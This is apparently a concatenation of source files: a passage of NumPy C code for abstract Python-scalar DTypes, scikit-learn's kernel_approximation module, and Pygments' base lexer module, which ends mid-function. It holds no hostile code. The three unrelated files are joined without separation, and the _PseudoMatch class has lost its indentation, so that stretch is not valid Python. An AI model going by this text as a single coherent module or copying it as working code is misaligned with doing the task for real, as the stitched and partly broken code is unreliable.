        PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
        .tp_name = "numpy.dtypes._ComplexAbstractDType",
        .tp_base = &PyArrayDescr_Type,
        .tp_basicsize = sizeof(PyArray_Descr),
        .tp_flags = Py_TPFLAGS_DEFAULT,
    },},
    .type_num = -1,
    .flags = NPY_DT_ABSTRACT,
};

NPY_DType_Slots pycomplexdtype_slots = {
    .discover_descr_from_pyobject = discover_descriptor_from_pycomplex,
    .default_descr = complex_default_descriptor,
    .common_dtype = complex_common_dtype,
};

/* DType representing a bare Python `complex`. */
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_PyComplexDType = {{{
        PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
        .tp_name = "numpy.dtypes._PyComplexDType",
        .tp_base = NULL,  /* set in initialize_and_map_pytypes_to_dtypes */
        .tp_basicsize = sizeof(PyArray_Descr),
        .tp_flags = Py_TPFLAGS_DEFAULT,
    },},
    .type_num = -1,
    .dt_slots = &pycomplexdtype_slots,
    .scalar_type = NULL,  /* set in initialize_and_map_pytypes_to_dtypes */
};
/*
* Additional functions to deal with Python literal int, float, complex
*/
/*
* This function takes an existing array operand and if the new descr does
* not match, replaces it with a new array that has the correct descriptor
* and holds exactly the scalar value.
*/
/*
 * Replace *operand with a fresh 0-d array of `descr` holding exactly the
 * value of `scalar`, unless the existing operand already matches.
 * Returns 0 on success, -1 with an exception set on failure.
 */
NPY_NO_EXPORT int
npy_update_operand_for_scalar(
        PyArrayObject **operand, PyObject *scalar, PyArray_Descr *descr,
        NPY_CASTING casting)
{
    if (PyArray_EquivTypes(PyArray_DESCR(*operand), descr)) {
        /*
         * TODO: This is an unfortunate work-around for legacy type resolvers
         *       (see `convert_ufunc_arguments` in `ufunc_object.c`), that
         *       currently forces us to replace the array.
         */
        if (!(PyArray_FLAGS(*operand) & NPY_ARRAY_WAS_PYTHON_INT)) {
            /* Equivalent descr and not a Python-int operand: keep as-is. */
            return 0;
        }
    }
    else if (NPY_UNLIKELY(casting == NPY_EQUIV_CASTING) &&
             descr->type_num != NPY_OBJECT) {
        /*
         * incredibly niche, but users could pass equiv casting and we
         * actually need to cast.  Let object pass (technically correct) but
         * in all other cases, we don't technically consider equivalent.
         * NOTE(seberg): I don't think we should be beholden to this logic.
         */
        PyErr_Format(PyExc_TypeError,
                "cannot cast Python %s to %S under the casting rule 'equiv'",
                Py_TYPE(scalar)->tp_name, descr);
        return -1;
    }

    /* Build a fresh 0-d array with the requested descriptor (steals the
     * extra descr reference taken here). */
    Py_INCREF(descr);
    PyArrayObject *new = (PyArrayObject *)PyArray_NewFromDescr(
            &PyArray_Type, descr, 0, NULL, NULL, NULL, 0, NULL);
    Py_SETREF(*operand, new);
    if (*operand == NULL) {
        return -1;
    }
    if (scalar == NULL) {
        /* The ufunc.resolve_dtypes paths can go here. Anything should go. */
        return 0;
    }
    return PyArray_SETITEM(new, PyArray_BYTES(*operand), scalar);
}
/*
* When a user passed a Python literal (int, float, complex), special promotion
* rules mean that we don't know the exact descriptor that should be used.
*
* Typically, this just doesn't really matter. Unfortunately, there are two
* exceptions:
* 1. The user might have passed `signature=` which may not be compatible.
* In that case, we cannot really assume "safe" casting.
* 2. It is at least fathomable that a DType doesn't deal with this directly.
* or that using the original int64/object is wrong in the type resolution.
*
* The solution is to assume that we can use the common DType of the signature
* and the Python scalar DType (`in_DT`) as a safe intermediate.
*/
/*
 * Find the descriptor to use for a Python scalar given the scalar's own
 * DType (`in_DT`) and the operation/signature DType (`op_DT`).  Falls back
 * to `original_descr` whenever a common DType cannot be determined.
 * Returns a new reference (never NULL unless an unexpected error escapes
 * the discovery call at the end).
 */
NPY_NO_EXPORT PyArray_Descr *
npy_find_descr_for_scalar(
        PyObject *scalar, PyArray_Descr *original_descr,
        PyArray_DTypeMeta *in_DT, PyArray_DTypeMeta *op_DT)
{
    PyArray_Descr *res;
    /* There is a good chance, descriptors already match... */
    if (NPY_DTYPE(original_descr) == op_DT) {
        Py_INCREF(original_descr);
        return original_descr;
    }
    PyArray_DTypeMeta *common = PyArray_CommonDType(in_DT, op_DT);
    if (common == NULL) {
        /* Promotion failure is swallowed deliberately: */
        PyErr_Clear();
        /* This is fine.  We simply assume the original descr is viable. */
        Py_INCREF(original_descr);
        return original_descr;
    }
    /* A very likely case is that there is nothing to do: */
    if (NPY_DTYPE(original_descr) == common) {
        Py_DECREF(common);
        Py_INCREF(original_descr);
        return original_descr;
    }
    if (!NPY_DT_is_parametric(common) ||
            /* In some paths we only have a scalar type, can't discover */
            scalar == NULL ||
            /* If the DType doesn't know the scalar type, guess at default. */
            !NPY_DT_CALL_is_known_scalar_type(common, Py_TYPE(scalar))) {
        if (common->singleton != NULL) {
            res = common->singleton;
            Py_INCREF(res);
        }
        else {
            res = NPY_DT_CALL_default_descr(common);
        }
    }
    else {
        /* Parametric DType that knows this scalar: discover exact descr. */
        res = NPY_DT_CALL_discover_descr_from_pyobject(common, scalar);
    }
    Py_DECREF(common);
    return res;
}
"""
The :mod:`sklearn.kernel_approximation` module implements several
approximate kernel feature maps base on Fourier transforms.
"""
# Author: Andreas Mueller <amueller@ais.uni-bonn.de>
#
# License: BSD 3 clause
import warnings
import numpy as np
import scipy.sparse as sp
from scipy.linalg import svd
from .base import BaseEstimator
from .base import TransformerMixin
from .utils import check_array, check_random_state, as_float_array
from .utils.extmath import safe_sparse_dot
from .utils.validation import check_is_fitted
from .metrics.pairwise import pairwise_kernels
class RBFSampler(BaseEstimator, TransformerMixin):
    """Approximates feature map of an RBF kernel by Monte Carlo approximation
    of its Fourier transform.

    It implements a variant of Random Kitchen Sinks.[1]

    Read more in the :ref:`User Guide <rbf_kernel_approx>`.

    Parameters
    ----------
    gamma : float
        Parameter of RBF kernel: exp(-gamma * x^2)

    n_components : int
        Number of Monte Carlo samples per original feature.
        Equals the dimensionality of the computed feature space.

    random_state : {int, RandomState}, optional
        If int, random_state is the seed used by the random number generator;
        if RandomState instance, random_state is the random number generator.

    Notes
    -----
    See "Random Features for Large-Scale Kernel Machines" by A. Rahimi and
    Benjamin Recht.

    [1] "Weighted Sums of Random Kitchen Sinks: Replacing
    minimization with randomization in learning" by A. Rahimi and
    Benjamin Recht.
    (http://people.eecs.berkeley.edu/~brecht/papers/08.rah.rec.nips.pdf)
    """

    def __init__(self, gamma=1., n_components=100, random_state=None):
        self.gamma = gamma
        self.n_components = n_components
        self.random_state = random_state

    def fit(self, X, y=None):
        """Fit the model with X.

        Draws the random projection weights and phase offsets according to
        the number of input features.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Training data, where n_samples in the number of samples
            and n_features is the number of features.

        Returns
        -------
        self : object
            Returns the transformer.
        """
        X = check_array(X, accept_sparse='csr')
        rng = check_random_state(self.random_state)
        n_features = X.shape[1]

        # Weights sampled from N(0, 2*gamma): the Fourier transform of the
        # RBF kernel.
        self.random_weights_ = (np.sqrt(2 * self.gamma) * rng.normal(
            size=(n_features, self.n_components)))
        # Random phases uniform on [0, 2*pi).
        self.random_offset_ = rng.uniform(0, 2 * np.pi,
                                          size=self.n_components)
        return self

    def transform(self, X, y=None):
        """Apply the approximate feature map to X.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            New data, where n_samples in the number of samples
            and n_features is the number of features.

        Returns
        -------
        X_new : array-like, shape (n_samples, n_components)
        """
        check_is_fitted(self, 'random_weights_')

        X = check_array(X, accept_sparse='csr')
        # cos(X @ W + b) * sqrt(2 / n_components), computed in place.
        embedding = safe_sparse_dot(X, self.random_weights_)
        embedding += self.random_offset_
        np.cos(embedding, embedding)
        embedding *= np.sqrt(2.) / np.sqrt(self.n_components)
        return embedding
class SkewedChi2Sampler(BaseEstimator, TransformerMixin):
    """Approximates feature map of the "skewed chi-squared" kernel by Monte
    Carlo approximation of its Fourier transform.

    Read more in the :ref:`User Guide <skewed_chi_kernel_approx>`.

    Parameters
    ----------
    skewedness : float
        "skewedness" parameter of the kernel. Needs to be cross-validated.

    n_components : int
        number of Monte Carlo samples per original feature.
        Equals the dimensionality of the computed feature space.

    random_state : {int, RandomState}, optional
        If int, random_state is the seed used by the random number generator;
        if RandomState instance, random_state is the random number generator.

    References
    ----------
    See "Random Fourier Approximations for Skewed Multiplicative Histogram
    Kernels" by Fuxin Li, Catalin Ionescu and Cristian Sminchisescu.

    See also
    --------
    AdditiveChi2Sampler : A different approach for approximating an additive
        variant of the chi squared kernel.

    sklearn.metrics.pairwise.chi2_kernel : The exact chi squared kernel.
    """

    def __init__(self, skewedness=1., n_components=100, random_state=None):
        self.skewedness = skewedness
        self.n_components = n_components
        self.random_state = random_state

    def fit(self, X, y=None):
        """Fit the model with X.

        Samples random projection according to n_features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training data, where n_samples in the number of samples
            and n_features is the number of features.

        Returns
        -------
        self : object
            Returns the transformer.
        """
        X = check_array(X)
        random_state = check_random_state(self.random_state)
        n_features = X.shape[1]
        uniform = random_state.uniform(size=(n_features, self.n_components))
        # transform by inverse CDF of sech
        self.random_weights_ = (1. / np.pi
                                * np.log(np.tan(np.pi / 2. * uniform)))
        self.random_offset_ = random_state.uniform(0, 2 * np.pi,
                                                   size=self.n_components)
        return self

    def transform(self, X, y=None):
        """Apply the approximate feature map to X.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            New data, where n_samples in the number of samples
            and n_features is the number of features.

        Returns
        -------
        X_new : array-like, shape (n_samples, n_components)
        """
        check_is_fitted(self, 'random_weights_')

        # Copy first (as_float_array), because X is mutated in place below.
        X = as_float_array(X, copy=True)
        X = check_array(X, copy=False)
        if (X < 0).any():
            raise ValueError("X may not contain entries smaller than zero.")

        # In-place: X <- log(X + skewedness); order of these ops matters.
        X += self.skewedness
        np.log(X, X)
        projection = safe_sparse_dot(X, self.random_weights_)
        projection += self.random_offset_
        np.cos(projection, projection)
        projection *= np.sqrt(2.) / np.sqrt(self.n_components)
        return projection
class AdditiveChi2Sampler(BaseEstimator, TransformerMixin):
    """Approximate feature map for additive chi2 kernel.

    Uses sampling the fourier transform of the kernel characteristic
    at regular intervals.

    Since the kernel that is to be approximated is additive, the components of
    the input vectors can be treated separately.  Each entry in the original
    space is transformed into 2*sample_steps+1 features, where sample_steps is
    a parameter of the method. Typical values of sample_steps include 1, 2 and
    3.

    Optimal choices for the sampling interval for certain data ranges can be
    computed (see the reference). The default values should be reasonable.

    Read more in the :ref:`User Guide <additive_chi_kernel_approx>`.

    Parameters
    ----------
    sample_steps : int, optional
        Gives the number of (complex) sampling points.
    sample_interval : float, optional
        Sampling interval. Must be specified when sample_steps not in {1,2,3}.

    Notes
    -----
    This estimator approximates a slightly different version of the additive
    chi squared kernel then ``metric.additive_chi2`` computes.

    See also
    --------
    SkewedChi2Sampler : A Fourier-approximation to a non-additive variant of
        the chi squared kernel.

    sklearn.metrics.pairwise.chi2_kernel : The exact chi squared kernel.

    sklearn.metrics.pairwise.additive_chi2_kernel : The exact additive chi
        squared kernel.

    References
    ----------
    See `"Efficient additive kernels via explicit feature maps"
    <http://www.robots.ox.ac.uk/~vedaldi/assets/pubs/vedaldi11efficient.pdf>`_
    A. Vedaldi and A. Zisserman, Pattern Analysis and Machine Intelligence,
    2011
    """

    def __init__(self, sample_steps=2, sample_interval=None):
        self.sample_steps = sample_steps
        self.sample_interval = sample_interval

    def fit(self, X, y=None):
        """Set parameters.

        Only chooses ``sample_interval_``; no statistics of X are used.
        """
        X = check_array(X, accept_sparse='csr')
        if self.sample_interval is None:
            # See reference, figure 2 c): tabulated intervals for the
            # supported sample_steps values.
            if self.sample_steps == 1:
                self.sample_interval_ = 0.8
            elif self.sample_steps == 2:
                self.sample_interval_ = 0.5
            elif self.sample_steps == 3:
                self.sample_interval_ = 0.4
            else:
                raise ValueError("If sample_steps is not in [1, 2, 3],"
                                 " you need to provide sample_interval")
        else:
            self.sample_interval_ = self.sample_interval
        return self

    def transform(self, X, y=None):
        """Apply approximate feature map to X.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = (n_samples, n_features)

        Returns
        -------
        X_new : {array, sparse matrix}, \
               shape = (n_samples, n_features * (2*sample_steps + 1))
            Whether the return value is an array of sparse matrix depends on
            the type of the input X.
        """
        msg = ("%(name)s is not fitted. Call fit to set the parameters before"
               " calling transform")
        check_is_fitted(self, "sample_interval_", msg=msg)

        X = check_array(X, accept_sparse='csr')
        sparse = sp.issparse(X)

        # check if X has negative values. Doesn't play well with np.log.
        if ((X.data if sparse else X) < 0).any():
            raise ValueError("Entries of X must be non-negative.")
        # zeroth component
        # 1/cosh = sech
        # cosh(0) = 1.0

        # Dispatch to the format-specific implementation.
        transf = self._transform_sparse if sparse else self._transform_dense
        return transf(X)

    def _transform_dense(self, X):
        # Builds [sqrt(x*L), cos/sin pairs for j=1..sample_steps-1] per
        # feature, operating only on the non-zero entries.
        non_zero = (X != 0.0)
        X_nz = X[non_zero]

        X_step = np.zeros_like(X)
        X_step[non_zero] = np.sqrt(X_nz * self.sample_interval_)

        X_new = [X_step]

        log_step_nz = self.sample_interval_ * np.log(X_nz)
        step_nz = 2 * X_nz * self.sample_interval_

        for j in range(1, self.sample_steps):
            factor_nz = np.sqrt(step_nz /
                                np.cosh(np.pi * j * self.sample_interval_))

            X_step = np.zeros_like(X)
            X_step[non_zero] = factor_nz * np.cos(j * log_step_nz)
            X_new.append(X_step)

            X_step = np.zeros_like(X)
            X_step[non_zero] = factor_nz * np.sin(j * log_step_nz)
            X_new.append(X_step)

        return np.hstack(X_new)

    def _transform_sparse(self, X):
        # Same math as _transform_dense, but reuses X's CSR structure
        # (indices/indptr) since the sparsity pattern is preserved.
        indices = X.indices.copy()
        indptr = X.indptr.copy()

        data_step = np.sqrt(X.data * self.sample_interval_)
        X_step = sp.csr_matrix((data_step, indices, indptr),
                               shape=X.shape, dtype=X.dtype, copy=False)
        X_new = [X_step]

        log_step_nz = self.sample_interval_ * np.log(X.data)
        step_nz = 2 * X.data * self.sample_interval_

        for j in range(1, self.sample_steps):
            factor_nz = np.sqrt(step_nz /
                                np.cosh(np.pi * j * self.sample_interval_))

            data_step = factor_nz * np.cos(j * log_step_nz)
            X_step = sp.csr_matrix((data_step, indices, indptr),
                                   shape=X.shape, dtype=X.dtype, copy=False)
            X_new.append(X_step)

            data_step = factor_nz * np.sin(j * log_step_nz)
            X_step = sp.csr_matrix((data_step, indices, indptr),
                                   shape=X.shape, dtype=X.dtype, copy=False)
            X_new.append(X_step)

        return sp.hstack(X_new)
class Nystroem(BaseEstimator, TransformerMixin):
    """Approximate a kernel map using a subset of the training data.

    Constructs an approximate feature map for an arbitrary kernel
    using a subset of the data as basis.

    Read more in the :ref:`User Guide <nystroem_kernel_approx>`.

    Parameters
    ----------
    kernel : string or callable, default="rbf"
        Kernel map to be approximated. A callable should accept two arguments
        and the keyword arguments passed to this object as kernel_params, and
        should return a floating point number.

    n_components : int
        Number of features to construct.
        How many data points will be used to construct the mapping.

    gamma : float, default=None
        Gamma parameter for the RBF, polynomial, exponential chi2 and
        sigmoid kernels. Interpretation of the default value is left to
        the kernel; see the documentation for sklearn.metrics.pairwise.
        Ignored by other kernels.

    degree : float, default=3
        Degree of the polynomial kernel. Ignored by other kernels.

    coef0 : float, default=1
        Zero coefficient for polynomial and sigmoid kernels.
        Ignored by other kernels.

    kernel_params : mapping of string to any, optional
        Additional parameters (keyword arguments) for kernel function passed
        as callable object.

    random_state : {int, RandomState}, optional
        If int, random_state is the seed used by the random number generator;
        if RandomState instance, random_state is the random number generator.

    Attributes
    ----------
    components_ : array, shape (n_components, n_features)
        Subset of training points used to construct the feature map.

    component_indices_ : array, shape (n_components)
        Indices of ``components_`` in the training set.

    normalization_ : array, shape (n_components, n_components)
        Normalization matrix needed for embedding.
        Square root of the kernel matrix on ``components_``.

    References
    ----------
    * Williams, C.K.I. and Seeger, M.
      "Using the Nystroem method to speed up kernel machines",
      Advances in neural information processing systems 2001

    * T. Yang, Y. Li, M. Mahdavi, R. Jin and Z. Zhou
      "Nystroem Method vs Random Fourier Features: A Theoretical and Empirical
      Comparison",
      Advances in Neural Information Processing Systems 2012

    See also
    --------
    RBFSampler : An approximation to the RBF kernel using random Fourier
                 features.

    sklearn.metrics.pairwise.kernel_metrics : List of built-in kernels.
    """

    def __init__(self, kernel="rbf", gamma=None, coef0=1, degree=3,
                 kernel_params=None, n_components=100, random_state=None):
        self.kernel = kernel
        self.gamma = gamma
        self.coef0 = coef0
        self.degree = degree
        self.kernel_params = kernel_params
        self.n_components = n_components
        self.random_state = random_state

    def fit(self, X, y=None):
        """Fit estimator to data.

        Samples a subset of training points, computes kernel
        on these and computes normalization matrix.

        Parameters
        ----------
        X : array-like, shape=(n_samples, n_feature)
            Training data.
        """
        X = check_array(X, accept_sparse='csr')
        rnd = check_random_state(self.random_state)
        n_samples = X.shape[0]

        # get basis vectors
        if self.n_components > n_samples:
            # XXX should we just bail?
            n_components = n_samples
            warnings.warn("n_components > n_samples. This is not possible.\n"
                          "n_components was set to n_samples, which results"
                          " in inefficient evaluation of the full kernel.")
        else:
            n_components = self.n_components
        n_components = min(n_samples, n_components)
        inds = rnd.permutation(n_samples)
        basis_inds = inds[:n_components]
        basis = X[basis_inds]

        basis_kernel = pairwise_kernels(basis, metric=self.kernel,
                                        filter_params=True,
                                        **self._get_kernel_params())

        # sqrt of kernel matrix on basis vectors
        U, S, V = svd(basis_kernel)
        # Clamp tiny singular values to keep 1/sqrt(S) finite.
        S = np.maximum(S, 1e-12)
        self.normalization_ = np.dot(U * 1. / np.sqrt(S), V)
        self.components_ = basis
        # Store only the indices actually used as basis vectors, matching
        # the documented shape (n_components).  Previously the full
        # length-n_samples permutation was stored here.
        self.component_indices_ = basis_inds
        return self

    def transform(self, X):
        """Apply feature map to X.

        Computes an approximate feature map using the kernel
        between some training points and X.

        Parameters
        ----------
        X : array-like, shape=(n_samples, n_features)
            Data to transform.

        Returns
        -------
        X_transformed : array, shape=(n_samples, n_components)
            Transformed data.
        """
        check_is_fitted(self, 'components_')
        X = check_array(X, accept_sparse='csr')

        kernel_params = self._get_kernel_params()
        embedded = pairwise_kernels(X, self.components_,
                                    metric=self.kernel,
                                    filter_params=True,
                                    **kernel_params)
        return np.dot(embedded, self.normalization_.T)

    def _get_kernel_params(self):
        # Only builtin (string-named) kernels accept gamma/degree/coef0;
        # a callable kernel gets just the user-supplied kernel_params.
        params = self.kernel_params
        if params is None:
            params = {}
        if not callable(self.kernel):
            params['gamma'] = self.gamma
            params['degree'] = self.degree
            params['coef0'] = self.coef0
        return params
# -*- coding: utf-8 -*-
"""
pygments.lexer
~~~~~~~~~~~~~~
Base lexer classes.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re, itertools
from pygments.filter import apply_filters, Filter
from pygments.filters import get_filter_by_name
from pygments.token import Error, Text, Other, _TokenType
from pygments.util import get_bool_opt, get_int_opt, get_list_opt, \
make_analysator
# Public names exported by this module.
__all__ = ['Lexer', 'RegexLexer', 'ExtendedRegexLexer', 'DelegatingLexer',
           'LexerContext', 'include', 'inherit', 'bygroups', 'using', 'this']
# BOM byte signatures mapped to the encoding they imply.  Checked in order,
# so the 4-byte UTF-32 signatures must come before their UTF-16 prefixes.
_encoding_map = [('\xef\xbb\xbf', 'utf-8'),
                 ('\xff\xfe\0\0', 'utf-32'),
                 ('\0\0\xfe\xff', 'utf-32be'),
                 ('\xff\xfe', 'utf-16'),
                 ('\xfe\xff', 'utf-16be')]
# Fallback analyse_text implementation: never claims a text (score 0.0).
_default_analyse = staticmethod(lambda x: 0.0)
class LexerMeta(type):
    """
    Metaclass that wraps any ``analyse_text`` method found in a class
    body with ``make_analysator`` so it behaves like a static method
    always returning a float.
    """
    def __new__(mcs, name, bases, namespace):
        if 'analyse_text' in namespace:
            namespace['analyse_text'] = \
                make_analysator(namespace['analyse_text'])
        return type.__new__(mcs, name, bases, namespace)
class Lexer(object):
    """
    Lexer for a specific language.

    Basic options recognized:

    ``stripnl``
        Strip leading and trailing newlines from the input (default: True).
    ``stripall``
        Strip all leading and trailing whitespace from the input
        (default: False).
    ``ensurenl``
        Make sure that the input ends with a newline (default: True). This
        is required for some lexers that consume input linewise.
        *New in Pygments 1.3.*
    ``tabsize``
        If given and greater than 0, expand tabs in the input (default: 0).
    ``encoding``
        If given, must be an encoding name. This encoding will be used to
        convert the input string to Unicode, if it is not already a Unicode
        string (default: ``'latin1'``).
        Can also be ``'guess'`` to use a simple UTF-8 / Latin1 detection, or
        ``'chardet'`` to use the chardet library, if it is installed.
    """

    #: Name of the lexer
    name = None
    #: Shortcuts for the lexer
    aliases = []
    #: File name globs
    filenames = []
    #: Secondary file name globs
    alias_filenames = []
    #: MIME types
    mimetypes = []
    #: Priority, should multiple lexers match and no content is provided
    priority = 0
    # Python 2 metaclass declaration; LexerMeta wraps analyse_text so it
    # acts as a float-returning static method.
    __metaclass__ = LexerMeta

    def __init__(self, **options):
        """Store the raw options dict and extract the common ones."""
        self.options = options
        self.stripnl = get_bool_opt(options, 'stripnl', True)
        self.stripall = get_bool_opt(options, 'stripall', False)
        self.ensurenl = get_bool_opt(options, 'ensurenl', True)
        self.tabsize = get_int_opt(options, 'tabsize', 0)
        self.encoding = options.get('encoding', 'latin1')
        # self.encoding = options.get('inencoding', None) or self.encoding
        self.filters = []
        for filter_ in get_list_opt(options, 'filters', ()):
            self.add_filter(filter_)

    def __repr__(self):
        if self.options:
            return '<pygments.lexers.%s with %r>' % (self.__class__.__name__,
                                                     self.options)
        else:
            return '<pygments.lexers.%s>' % self.__class__.__name__

    def add_filter(self, filter_, **options):
        """
        Add a new stream filter to this lexer.

        ``filter_`` may be a Filter instance or a registered filter name,
        which is resolved with ``get_filter_by_name``.
        """
        if not isinstance(filter_, Filter):
            filter_ = get_filter_by_name(filter_, **options)
        self.filters.append(filter_)

    def analyse_text(text):
        """
        Has to return a float between ``0`` and ``1`` that indicates
        if a lexer wants to highlight this text. Used by ``guess_lexer``.
        If this method returns ``0`` it won't highlight it in any case, if
        it returns ``1`` highlighting with this lexer is guaranteed.

        The `LexerMeta` metaclass automatically wraps this function so
        that it works like a static method (no ``self`` or ``cls``
        parameter) and the return value is automatically converted to
        `float`. If the return value is an object that is boolean `False`
        it's the same as if the return values was ``0.0``.

        This default implementation returns ``None``, which the metaclass
        wrapper treats as 0.0.
        """

    def get_tokens(self, text, unfiltered=False):
        """
        Return an iterable of (tokentype, value) pairs generated from
        `text`. If `unfiltered` is set to `True`, the filtering mechanism
        is bypassed even if filters are defined.

        Also preprocess the text, i.e. expand tabs and strip it if
        wanted and applies registered filters.
        """
        # First, make sure we are working with a unicode string.
        if not isinstance(text, unicode):
            if self.encoding == 'guess':
                # Simple heuristic: try UTF-8 first, fall back to Latin-1.
                try:
                    text = text.decode('utf-8')
                    if text.startswith(u'\ufeff'):
                        text = text[len(u'\ufeff'):]
                except UnicodeDecodeError:
                    text = text.decode('latin1')
            elif self.encoding == 'chardet':
                try:
                    import chardet
                except ImportError:
                    raise ImportError('To enable chardet encoding guessing, '
                                      'please install the chardet library '
                                      'from http://chardet.feedparser.org/')
                # check for BOM first
                decoded = None
                for bom, encoding in _encoding_map:
                    if text.startswith(bom):
                        decoded = unicode(text[len(bom):], encoding,
                                          errors='replace')
                        break
                # no BOM found, so use chardet
                if decoded is None:
                    enc = chardet.detect(text[:1024]) # Guess using first 1KB
                    decoded = unicode(text, enc.get('encoding') or 'utf-8',
                                      errors='replace')
                text = decoded
            else:
                text = text.decode(self.encoding)
        else:
            # Already unicode: just drop a leading BOM if present.
            if text.startswith(u'\ufeff'):
                text = text[len(u'\ufeff'):]
        # text now *is* a unicode string
        # Normalize all line endings to '\n' before stripping/expanding.
        text = text.replace('\r\n', '\n')
        text = text.replace('\r', '\n')
        if self.stripall:
            text = text.strip()
        elif self.stripnl:
            text = text.strip('\n')
        if self.tabsize > 0:
            text = text.expandtabs(self.tabsize)
        if self.ensurenl and not text.endswith('\n'):
            text += '\n'

        def streamer():
            # Drop the position component; get_tokens only yields
            # (tokentype, value) pairs.
            for i, t, v in self.get_tokens_unprocessed(text):
                yield t, v
        stream = streamer()
        if not unfiltered:
            stream = apply_filters(stream, self.filters, self)
        return stream

    def get_tokens_unprocessed(self, text):
        """
        Return an iterable of (index, tokentype, value) pairs.

        In subclasses, implement this method as a generator to
        maximize effectiveness.
        """
        raise NotImplementedError
class DelegatingLexer(Lexer):
    """
    Combine two lexers.  The language lexer scans the whole input first;
    every token it reports as the needle type (``Other`` by default) is
    collected into a buffer that is then lexed by the root lexer, and the
    two token streams are spliced back together with ``do_insertions``.

    The lexers from the ``template`` lexer package use this base lexer.
    """
    def __init__(self, _root_lexer, _language_lexer, _needle=Other, **options):
        self.root_lexer = _root_lexer(**options)
        self.language_lexer = _language_lexer(**options)
        self.needle = _needle
        Lexer.__init__(self, **options)

    def get_tokens_unprocessed(self, text):
        buffered = ''
        insertions = []
        pending = []
        for index, token, value in \
                self.language_lexer.get_tokens_unprocessed(text):
            if token is self.needle:
                # Flush pending language tokens at the current needle
                # offset before growing the buffer the root lexer sees.
                if pending:
                    insertions.append((len(buffered), pending))
                    pending = []
                buffered += value
            else:
                pending.append((index, token, value))
        if pending:
            insertions.append((len(buffered), pending))
        return do_insertions(
            insertions, self.root_lexer.get_tokens_unprocessed(buffered))
#-------------------------------------------------------------------------------
# RegexLexer and ExtendedRegexLexer
#
class include(str):
    """
    Indicates that a state should include rules from another state.

    It is a plain ``str`` subclass so the referenced state name can be
    used directly as a dictionary key during token preprocessing.
    """
    pass
class _inherit(object):
    """
    Indicates the a state should inherit from its superclass.

    Only the singleton ``inherit`` below is ever used; state processing
    compares against it by identity/equality.
    """
    def __repr__(self):
        return 'inherit'
# Module-level singleton placed inside token definitions.
inherit = _inherit()
class combined(tuple):
    """
    Marker tuple listing several state names that the lexer metaclass
    merges into one anonymous state.
    """
    def __new__(cls, *names):
        return tuple.__new__(cls, names)

    def __init__(self, *names):
        # The names were already stored by __new__; tuples are immutable,
        # so there is nothing left to initialise.
        pass
class _PseudoMatch(object):
"""
A pseudo match object constructed from a string.
"""
def __init__(self, start, text):
self._text = text
self._start = start
def start(self, arg=None):
return self._start
def end(self, arg=None):
return self._start + len(self._text)
def group(self, arg=None):
if arg:
raise IndexError('No such group')
return self._text
def groups(self):
return (self._text,)
def groupdict(self):
return {}
def bygroups(*args):
    """
    Callback that yields one action per capturing group of the match.

    ``None`` entries skip their group entirely.  A plain token type
    emits the group text directly (nothing for an empty group).  Any
    other action is treated as a sub-callback and invoked on a pseudo
    match covering just that group.
    """
    def callback(lexer, match, ctx=None):
        for group_no, action in enumerate(args, 1):
            if action is None:
                continue
            data = match.group(group_no)
            if type(action) is _TokenType:
                if data:
                    yield match.start(group_no), action, data
            elif data is not None:
                if ctx:
                    ctx.pos = match.start(group_no)
                pseudo = _PseudoMatch(match.start(group_no), data)
                for item in action(lexer, pseudo, ctx):
                    if item:
                        yield item
        if ctx:
            ctx.pos = match.end()
    return callback
class _This(object):
    """
    Special singleton used for indicating the caller class.

    Used by ``using``: passing ``this`` makes the callback reuse the
    current lexer (or a reconfigured instance of its class).
    """
# The one and only instance; compared by identity in ``using``.
this = _This()
def using(_other, **kwargs):
    """
    Callback that processes the match with a different lexer.

    The keyword arguments are forwarded to the lexer, except `state` which
    is handled separately.

    `state` specifies the state that the new lexer will start in, and can
    be an enumerable such as ('root', 'inline', 'string') or a simple
    string which is assumed to be on top of the root state.

    Note: For that to work, `_other` must not be an `ExtendedRegexLexer`.
    """
    # Keyword arguments forwarded to get_tokens_unprocessed (not the
    # lexer constructor): only the initial state stack.
    gt_kwargs = {}
    if 'state' in kwargs:
        s = kwargs.pop('state')
        if isinstance(s, (list, tuple)):
            gt_kwargs['stack'] = s
        else:
            gt_kwargs['stack'] = ('root', s)
    if _other is this:
        def callback(lexer, match, ctx=None):
            # if keyword arguments are given the callback
            # function has to create a new lexer instance
            if kwargs:
                # XXX: cache that somehow
                # NOTE(review): this mutates the closed-over kwargs dict
                # with the calling lexer's options on every invocation --
                # options from one call leak into the next.  Presumably
                # intentional caching behaviour upstream; confirm before
                # changing.
                kwargs.update(lexer.options)
                lx = lexer.__class__(**kwargs)
            else:
                lx = lexer
            s = match.start()
            for i, t, v in lx.get_tokens_unprocessed(match.group(), **gt_kwargs):
                yield i + s, t, v
            if ctx:
                ctx.pos = match.end()
    else:
        def callback(lexer, match, ctx=None):
            # XXX: cache that somehow
            # Same closed-over kwargs mutation caveat as above.
            kwargs.update(lexer.options)
            lx = _other(**kwargs)
            s = match.start()
            for i, t, v in lx.get_tokens_unprocessed(match.group(), **gt_kwargs):
                yield i + s, t, v
            if ctx:
                ctx.pos = match.end()
    return callback
class RegexLexerMeta(LexerMeta):
    """
    Metaclass for RegexLexer, creates the self._tokens attribute from
    self.tokens on the first instantiation.
    """

    def _process_regex(cls, regex, rflags):
        """Preprocess the regular expression component of a token definition."""
        # Bind the compiled pattern's ``match`` method directly; the main
        # loop calls it as rexmatch(text, pos).
        return re.compile(regex, rflags).match

    def _process_token(cls, token):
        """Preprocess the token component of a token definition."""
        assert type(token) is _TokenType or callable(token), \
            'token type must be simple type or callable, not %r' % (token,)
        return token

    def _process_new_state(cls, new_state, unprocessed, processed):
        """Preprocess the state transition action of a token definition.

        Returns either an int (number of states to pop), the string
        '#push', or a tuple of state names to push.
        """
        if isinstance(new_state, str):
            # an existing state
            if new_state == '#pop':
                return -1
            elif new_state in unprocessed:
                return (new_state,)
            elif new_state == '#push':
                return new_state
            elif new_state[:5] == '#pop:':
                # '#pop:n' pops n states at once.
